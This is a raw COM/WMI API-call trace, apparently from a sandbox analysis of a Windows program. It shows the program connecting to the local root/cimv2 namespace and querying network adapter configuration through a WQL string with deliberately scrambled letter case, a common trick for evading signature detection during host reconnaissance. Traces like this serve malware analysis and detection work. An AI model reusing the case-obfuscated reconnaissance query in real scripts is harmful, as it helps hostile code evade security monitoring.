	[0127.051] IUnknown:AddRef (This=0x2ad3bb11e40) returned 0x3
	[0127.051] CoGetContextToken (in: pToken=0xd7ef71b1d0 | out: pToken=0xd7ef71b1d0) returned 0x0
	[0127.051] IUnknown:QueryInterface (in: This=0x2ad3bb11e40, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71b190 | out: ppvObject=0xd7ef71b190*=0x2ad3bb1ea00) returned 0x0
	[0127.052] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb1ea00, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71b1c0 | out: pCid=0xd7ef71b1c0) returned 0x0
	[0127.052] IUnknown:Release (This=0x2ad3bb1ea00) returned 0x3
	[0127.052] CoGetContextToken (in: pToken=0xd7ef71b1a0 | out: pToken=0xd7ef71b1a0) returned 0x0
	[0127.052] IUnknown:AddRef (This=0x2ad3bb11e40) returned 0x4
	[0127.052] IUnknown:QueryInterface (in: This=0x2ad3bb11e40, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71b2b8 | out: ppvObject=0xd7ef71b2b8*=0x0) returned 0x80004002
	[0127.052] IUnknown:Release (This=0x2ad3bb11e40) returned 0x3
	[0127.052] IUnknown:Release (This=0x2ad3bb11e40) returned 0x2
	[0127.052] WbemDefPath:IUnknown:Release (This=0x2ad3bb1e980) returned 0x0
	[0127.052] IUnknown:Release (This=0x2ad3bb11e40) returned 0x1
	[0127.052] CoGetContextToken (in: pToken=0xd7ef71bed0 | out: pToken=0xd7ef71bed0) returned 0x0
	[0127.052] CoGetContextToken (in: pToken=0xd7ef71be10 | out: pToken=0xd7ef71be10) returned 0x0
	[0127.052] IUnknown:AddRef (This=0x2ad3bb11e40) returned 0x2
	[0127.052] IUnknown:QueryInterface (in: This=0x2ad3bb11e40, riid=0xd7ef71bf50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71bf30 | out: ppvObject=0xd7ef71bf30*=0x2ad3bb11e40) returned 0x0
	[0127.052] IUnknown:Release (This=0x2ad3bb11e40) returned 0x2
	[0127.052] IUnknown:Release (This=0x2ad3bb11e40) returned 0x1
	[0127.053] CoGetContextToken (in: pToken=0xd7ef71c050 | out: pToken=0xd7ef71c050) returned 0x0
	[0127.053] CoGetContextToken (in: pToken=0xd7ef71bf90 | out: pToken=0xd7ef71bf90) returned 0x0
	[0127.053] IUnknown:AddRef (This=0x2ad3bb11e40) returned 0x2
	[0127.053] IUnknown:QueryInterface (in: This=0x2ad3bb11e40, riid=0xd7ef71c0d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71c0b0 | out: ppvObject=0xd7ef71c0b0*=0x2ad3bb11e40) returned 0x0
	[0127.053] IUnknown:Release (This=0x2ad3bb11e40) returned 0x2
	[0127.054] IUnknown:AddRef (This=0x2ad3bb11e40) returned 0x3
	[0127.054] IWbemPath:SetText (This=0x2ad3bb11e40, uMode=0x4, pszPath="//./root/cimv2") returned 0x0
	[0127.054] IUnknown:Release (This=0x2ad3bb11e40) returned 0x2
	[0127.054] CoGetContextToken (in: pToken=0xd7ef71d0d0 | out: pToken=0xd7ef71d0d0) returned 0x0
	[0127.054] CoGetContextToken (in: pToken=0xd7ef71d010 | out: pToken=0xd7ef71d010) returned 0x0
	[0127.054] IUnknown:AddRef (This=0x2ad3bb12980) returned 0x2
	[0127.054] IUnknown:QueryInterface (in: This=0x2ad3bb12980, riid=0xd7ef71d150*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71d130 | out: ppvObject=0xd7ef71d130*=0x2ad3bb12980) returned 0x0
	[0127.054] IUnknown:Release (This=0x2ad3bb12980) returned 0x2
	[0127.054] IUnknown:AddRef (This=0x2ad3bb12980) returned 0x3
	[0127.054] IWbemPath:SetText (This=0x2ad3bb12980, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.054] IUnknown:Release (This=0x2ad3bb12980) returned 0x2
	[0127.055] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71d3e0 | out: puCount=0xd7ef71d3e0*=0x2) returned 0x0
	[0127.055] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d3e0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d3e0*=0x17, pszText=0x0) returned 0x0
	[0127.056] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d3e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d3e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.057] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71d390 | out: puCount=0xd7ef71d390*=0x2) returned 0x0
	[0127.057] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d390*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d390*=0x17, pszText=0x0) returned 0x0
	[0127.057] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d390*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d390*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.058] CoGetObjectContext (in: riid=0xd7ef71d2c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71d2c0 | out: ppv=0xd7ef71d2c0*=0x2ad205dbe30) returned 0x0
	[0127.058] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71d2e0 | out: pAptType=0xd7ef71d2e0*=1) returned 0x0
	[0127.058] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71d3e8 | out: ppvObject=0xd7ef71d3e8*=0x0) returned 0x80004002
	[0127.058] IUnknown:Release (This=0x2ad205dbe30) returned 0x2
	[0127.058] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0xd7ef71d100 | out: lpiid=0xd7ef71d100) returned 0x0
	[0127.058] CoGetClassObject (in: rclsid=0x2ad3bb03f08*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71cf70 | out: ppv=0xd7ef71cf70*=0x2ad3bb1e6e0) returned 0x0
	[0127.058] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1e6e0, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71cc80 | out: ppvObject=0xd7ef71cc80*=0x0) returned 0x80004002
	[0127.059] WbemLocator:IClassFactory:CreateInstance (in: This=0x2ad3bb1e6e0, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cc68 | out: ppvObject=0xd7ef71cc68*=0x2ad3bb1e980) returned 0x0
	[0127.059] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1e980, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cb70 | out: ppvObject=0xd7ef71cb70*=0x2ad3bb1e980) returned 0x0
	[0127.059] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1e980, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71cbf0 | out: ppvObject=0xd7ef71cbf0*=0x0) returned 0x80004002
	[0127.059] WbemLocator:IUnknown:AddRef (This=0x2ad3bb1e980) returned 0x3
	[0127.059] CoGetContextToken (in: pToken=0xd7ef71c840 | out: pToken=0xd7ef71c840) returned 0x0
	[0127.059] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1e980, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c800 | out: ppvObject=0xd7ef71c800*=0x0) returned 0x80004002
	[0127.059] CoGetContextToken (in: pToken=0xd7ef71c810 | out: pToken=0xd7ef71c810) returned 0x0
	[0127.059] WbemLocator:IUnknown:AddRef (This=0x2ad3bb1e980) returned 0x4
	[0127.059] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1e980, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c928 | out: ppvObject=0xd7ef71c928*=0x0) returned 0x80004002
	[0127.059] WbemLocator:IUnknown:Release (This=0x2ad3bb1e980) returned 0x3
	[0127.059] WbemLocator:IUnknown:Release (This=0x2ad3bb1e980) returned 0x2
	[0127.059] WbemLocator:IUnknown:Release (This=0x2ad3bb1e6e0) returned 0x0
	[0127.059] WbemLocator:IUnknown:Release (This=0x2ad3bb1e980) returned 0x1
	[0127.060] CoGetContextToken (in: pToken=0xd7ef71ce30 | out: pToken=0xd7ef71ce30) returned 0x0
	[0127.060] CoGetContextToken (in: pToken=0xd7ef71cd70 | out: pToken=0xd7ef71cd70) returned 0x0
	[0127.060] WbemLocator:IUnknown:AddRef (This=0x2ad3bb1e980) returned 0x2
	[0127.060] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1e980, riid=0xd7ef71ceb0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd7ef71ce90 | out: ppvObject=0xd7ef71ce90*=0x2ad3bb1e980) returned 0x0
	[0127.060] WbemLocator:IUnknown:Release (This=0x2ad3bb1e980) returned 0x2
	[0127.060] WbemLocator:IUnknown:Release (This=0x2ad3bb1e980) returned 0x1
	[0127.060] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71d290 | out: puCount=0xd7ef71d290*=0x2) returned 0x0
	[0127.060] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=8, puBuffLength=0xd7ef71d290*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d290*=0x17, pszText=0x0) returned 0x0
	[0127.061] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=8, puBuffLength=0xd7ef71d290*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d290*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.063] CoCreateInstance (in: rclsid=0x7ffbf68f15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbf68f14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xd7ef71cf00 | out: ppv=0xd7ef71cf00*=0x2ad3bb1e380) returned 0x0
	[0127.063] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2ad3bb1e380, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0xd7ef71d190 | out: ppNamespace=0xd7ef71d190*=0x2ad22d3bea0) returned 0x0
	[0127.088] IUnknown:QueryInterface (in: This=0x2ad22d3bea0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cd78 | out: ppvObject=0xd7ef71cd78*=0x2ad3bac3740) returned 0x0
	[0127.088] IClientSecurity:QueryBlanket (in: This=0x2ad3bac3740, pProxy=0x2ad22d3bea0, pAuthnSvc=0xd7ef71cd70, pAuthzSvc=0xd7ef71cd6c, pServerPrincName=0xd7ef71cd98, pAuthnLevel=0xd7ef71cd68, pImpLevel=0xd7ef71cd84, pAuthInfo=0xd7ef71cda8, pCapabilites=0xd7ef71cd80 | out: pAuthnSvc=0xd7ef71cd70*=0xa, pAuthzSvc=0xd7ef71cd6c*=0x0, pServerPrincName=0xd7ef71cd98, pAuthnLevel=0xd7ef71cd68*=0x6, pImpLevel=0xd7ef71cd84*=0x3, pAuthInfo=0xd7ef71cda8, pCapabilites=0xd7ef71cd80*=0x1) returned 0x0
	[0127.088] IUnknown:Release (This=0x2ad3bac3740) returned 0x1
	[0127.088] IUnknown:QueryInterface (in: This=0x2ad22d3bea0, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cd18 | out: ppvObject=0xd7ef71cd18*=0x2ad3bac3788) returned 0x0
	[0127.088] IUnknown:QueryInterface (in: This=0x2ad22d3bea0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cca8 | out: ppvObject=0xd7ef71cca8*=0x2ad3bac3740) returned 0x0
	[0127.088] IClientSecurity:SetBlanket (This=0x2ad3bac3740, pProxy=0x2ad22d3bea0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0127.088] IUnknown:Release (This=0x2ad3bac3740) returned 0x2
	[0127.088] IUnknown:Release (This=0x2ad3bac3788) returned 0x1
	[0127.088] CoTaskMemFree (pv=0x2ad3bac9bf0) 
	[0127.088] WbemLocator:IUnknown:Release (This=0x2ad3bb1e380) returned 0x0
	[0127.088] IUnknown:QueryInterface (in: This=0x2ad22d3bea0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c990 | out: ppvObject=0xd7ef71c990*=0x2ad3bac3788) returned 0x0
	[0127.089] IUnknown:QueryInterface (in: This=0x2ad3bac3788, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71ca10 | out: ppvObject=0xd7ef71ca10*=0x0) returned 0x80004002
	[0127.089] IUnknown:QueryInterface (in: This=0x2ad3bac3788, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c7a8 | out: ppvObject=0xd7ef71c7a8*=0x0) returned 0x80004002
	[0127.089] CoGetContextToken (in: pToken=0xd7ef71c660 | out: pToken=0xd7ef71c660) returned 0x0
	[0127.089] IUnknown:QueryInterface (in: This=0x2ad3bac3788, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c620 | out: ppvObject=0xd7ef71c620*=0x2ad3bac3668) returned 0x0
	[0127.090] IMarshal:GetUnmarshalClass (in: This=0x2ad3bac3668, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c650 | out: pCid=0xd7ef71c650) returned 0x0
	[0127.090] IUnknown:Release (This=0x2ad3bac3668) returned 0x3
	[0127.090] CoGetContextToken (in: pToken=0xd7ef71c630 | out: pToken=0xd7ef71c630) returned 0x0
	[0127.090] IUnknown:AddRef (This=0x2ad3bac3788) returned 0x4
	[0127.090] IUnknown:QueryInterface (in: This=0x2ad3bac3788, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c748 | out: ppvObject=0xd7ef71c748*=0x2ad3bac3750) returned 0x0
	[0127.090] IUnknown:Release (This=0x2ad3bac3788) returned 0x4
	[0127.090] IRpcOptions:Query (in: This=0x2ad3bac3750, pPrx=0x2ad3bac3788, dwProperty=2, pdwValue=0xd7ef71c7b8 | out: pdwValue=0xd7ef71c7b8) returned 0x80004002
	[0127.090] IUnknown:Release (This=0x2ad3bac3750) returned 0x3
	[0127.090] IUnknown:Release (This=0x2ad3bac3788) returned 0x2
	[0127.090] CoGetContextToken (in: pToken=0xd7ef71cb30 | out: pToken=0xd7ef71cb30) returned 0x0
	[0127.090] CoGetContextToken (in: pToken=0xd7ef71ca70 | out: pToken=0xd7ef71ca70) returned 0x0
	[0127.090] IUnknown:AddRef (This=0x2ad3bac3788) returned 0x3
	[0127.090] IUnknown:QueryInterface (in: This=0x2ad3bac3788, riid=0xd7ef71cbb0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0xd7ef71cb90 | out: ppvObject=0xd7ef71cb90*=0x2ad22d3bea0) returned 0x0
	[0127.091] IUnknown:Release (This=0x2ad3bac3788) returned 0x3
	[0127.091] IUnknown:Release (This=0x2ad22d3bea0) returned 0x2
	[0127.092] IUnknown:Release (This=0x2ad22d3bea0) returned 0x1
	[0127.092] SysStringLen (param_1=0x0) returned 0x0
	[0127.093] CoGetContextToken (in: pToken=0xd7ef71d1b0 | out: pToken=0xd7ef71d1b0) returned 0x0
	[0127.093] IUnknown:AddRef (This=0x2ad3bac3788) returned 0x2
	[0127.093] IUnknown:QueryInterface (in: This=0x2ad3bac3788, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cd80 | out: ppvObject=0xd7ef71cd80*=0x2ad3bac3788) returned 0x0
	[0127.093] IUnknown:Release (This=0x2ad3bac3788) returned 0x2
	[0127.093] IUnknown:Release (This=0x2ad3bac3788) returned 0x1
	[0127.093] CoGetContextToken (in: pToken=0xd7ef71cdd0 | out: pToken=0xd7ef71cdd0) returned 0x0
	[0127.093] CoGetContextToken (in: pToken=0xd7ef71cd10 | out: pToken=0xd7ef71cd10) returned 0x0
	[0127.093] IUnknown:AddRef (This=0x2ad3bac3788) returned 0x2
	[0127.093] IUnknown:QueryInterface (in: This=0x2ad3bac3788, riid=0xd7ef71ce50*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0xd7ef71ce30 | out: ppvObject=0xd7ef71ce30*=0x2ad22d3bea0) returned 0x0
	[0127.094] IUnknown:Release (This=0x2ad3bac3788) returned 0x2
	[0127.094] IUnknown:AddRef (This=0x2ad22d3bea0) returned 0x3
	[0127.094] IWbemServices:ExecQuery (in: This=0x2ad22d3bea0, strQueryLanguage="WQL", strQuery="select * from WIN32_NEtWorKADaptERCOnFIgUraTiOn", lFlags=16, pCtx=0x0, ppEnum=0xd7ef71d2c8 | out: ppEnum=0xd7ef71d2c8*=0x2ad206b9670) returned 0x0
	[0127.099] IUnknown:QueryInterface (in: This=0x2ad206b9670, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71ced8 | out: ppvObject=0xd7ef71ced8*=0x2ad206b9678) returned 0x0
	[0127.099] IClientSecurity:QueryBlanket (in: This=0x2ad206b9678, pProxy=0x2ad206b9670, pAuthnSvc=0xd7ef71ced0, pAuthzSvc=0xd7ef71cecc, pServerPrincName=0xd7ef71cef8, pAuthnLevel=0xd7ef71cec8, pImpLevel=0xd7ef71cee4, pAuthInfo=0xd7ef71cf08, pCapabilites=0xd7ef71cee0 | out: pAuthnSvc=0xd7ef71ced0*=0xa, pAuthzSvc=0xd7ef71cecc*=0x0, pServerPrincName=0xd7ef71cef8, pAuthnLevel=0xd7ef71cec8*=0x6, pImpLevel=0xd7ef71cee4*=0x3, pAuthInfo=0xd7ef71cf08, pCapabilites=0xd7ef71cee0*=0x1) returned 0x0
	[0127.099] IUnknown:Release (This=0x2ad206b9678) returned 0x1
	[0127.099] IUnknown:QueryInterface (in: This=0x2ad206b9670, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71ce78 | out: ppvObject=0xd7ef71ce78*=0x2ad3babb9f8) returned 0x0
	[0127.099] IUnknown:QueryInterface (in: This=0x2ad206b9670, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71ce08 | out: ppvObject=0xd7ef71ce08*=0x2ad206b9678) returned 0x0
	[0127.099] IClientSecurity:SetBlanket (This=0x2ad206b9678, pProxy=0x2ad206b9670, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0127.111] IUnknown:Release (This=0x2ad206b9678) returned 0x2
	[0127.111] IUnknown:Release (This=0x2ad3babb9f8) returned 0x1
	[0127.111] CoTaskMemFree (pv=0x2ad3baca640) 
	[0127.111] IUnknown:QueryInterface (in: This=0x2ad206b9670, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cab0 | out: ppvObject=0xd7ef71cab0*=0x2ad3babb9f8) returned 0x0
	[0127.111] IUnknown:QueryInterface (in: This=0x2ad3babb9f8, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71cb30 | out: ppvObject=0xd7ef71cb30*=0x0) returned 0x80004002
	[0127.112] IUnknown:QueryInterface (in: This=0x2ad3babb9f8, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c8c8 | out: ppvObject=0xd7ef71c8c8*=0x0) returned 0x80004002
	[0127.113] IUnknown:AddRef (This=0x2ad3babb9f8) returned 0x3
	[0127.113] CoGetContextToken (in: pToken=0xd7ef71c780 | out: pToken=0xd7ef71c780) returned 0x0
	[0127.113] IUnknown:QueryInterface (in: This=0x2ad3babb9f8, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c740 | out: ppvObject=0xd7ef71c740*=0x2ad3babb8d8) returned 0x0
	[0127.113] IMarshal:GetUnmarshalClass (in: This=0x2ad3babb8d8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c770 | out: pCid=0xd7ef71c770) returned 0x0
	[0127.113] IUnknown:Release (This=0x2ad3babb8d8) returned 0x3
	[0127.113] CoGetContextToken (in: pToken=0xd7ef71c750 | out: pToken=0xd7ef71c750) returned 0x0
	[0127.113] IUnknown:AddRef (This=0x2ad3babb9f8) returned 0x4
	[0127.113] IUnknown:QueryInterface (in: This=0x2ad3babb9f8, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c868 | out: ppvObject=0xd7ef71c868*=0x2ad3babb9c0) returned 0x0
	[0127.113] IUnknown:Release (This=0x2ad3babb9f8) returned 0x4
	[0127.113] IRpcOptions:Query (in: This=0x2ad3babb9c0, pPrx=0x2ad3babb9f8, dwProperty=2, pdwValue=0xd7ef71c8d8 | out: pdwValue=0xd7ef71c8d8) returned 0x80004002
	[0127.113] IUnknown:Release (This=0x2ad3babb9c0) returned 0x3
	[0127.113] IUnknown:Release (This=0x2ad3babb9f8) returned 0x2
	[0127.113] CoGetContextToken (in: pToken=0xd7ef71cc50 | out: pToken=0xd7ef71cc50) returned 0x0
	[0127.113] CoGetContextToken (in: pToken=0xd7ef71cb90 | out: pToken=0xd7ef71cb90) returned 0x0
	[0127.113] IUnknown:AddRef (This=0x2ad3babb9f8) returned 0x3
	[0127.113] IUnknown:QueryInterface (in: This=0x2ad3babb9f8, riid=0xd7ef71ccd0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xd7ef71ccb0 | out: ppvObject=0xd7ef71ccb0*=0x2ad206b9670) returned 0x0
	[0127.114] IUnknown:Release (This=0x2ad3babb9f8) returned 0x3
	[0127.114] IUnknown:Release (This=0x2ad206b9670) returned 0x2
	[0127.114] IUnknown:Release (This=0x2ad206b9670) returned 0x1
	[0127.114] IUnknown:Release (This=0x2ad22d3bea0) returned 0x2
	[0127.114] SysStringLen (param_1=0x0) returned 0x0
	[0127.114] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71d2f0 | out: puCount=0xd7ef71d2f0*=0x2) returned 0x0
	[0127.114] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d2f0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d2f0*=0x17, pszText=0x0) returned 0x0
